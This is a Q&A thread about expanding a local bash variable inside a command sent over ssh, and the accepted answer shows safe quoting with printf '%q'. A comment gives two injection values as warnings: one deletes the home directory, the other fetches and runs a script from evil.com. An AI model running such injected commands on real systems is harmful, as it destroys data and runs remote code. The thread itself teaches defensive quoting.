# bash: ssh : run command on remote machine with expanding variables

Tags: bash

I am trying the following

```
act_url="https://someurl"
url=`ssh user@xx.xx.xx.xx 'somecommand "$act_url"'`
echo $url
```

Here I want `$act_url` to be replaced with `https://someurl`

```
url=`ssh user@xx.xx.xx.xx 'somecommand "https://someurl"'`
```

But its not working.

Comment: The _easy_ fix is to make it `url=$(ssh user@xx.xx.xx.xx "somecommand $act_url")`, but that approach has serious security issues. You don't want to risk an `act_url` that contains `; rm -rf ~ #` or `$(curl http://evil.com/rootme.sh | sh)` somewhere in its text.

Answer (score 1, accepted):

You need to use double quotes, not single quotes, if you want an expansion to take place. Double quotes inside a single-quoted string are still *inside a single-quoted string* -- they're just literal text, not (local) shell syntax.

To do this *safely*, in a way that doesn't let hostile URLs run arbitrary commands, use `printf '%q '` to generate the command you're going to run:

```
act_url="https://someurl"
printf -v rmt_cmd '%q ' somecommand "$act_url"
url=$(ssh user@xx.xx.xx.xx "$rmt_cmd")
echo "$url"
```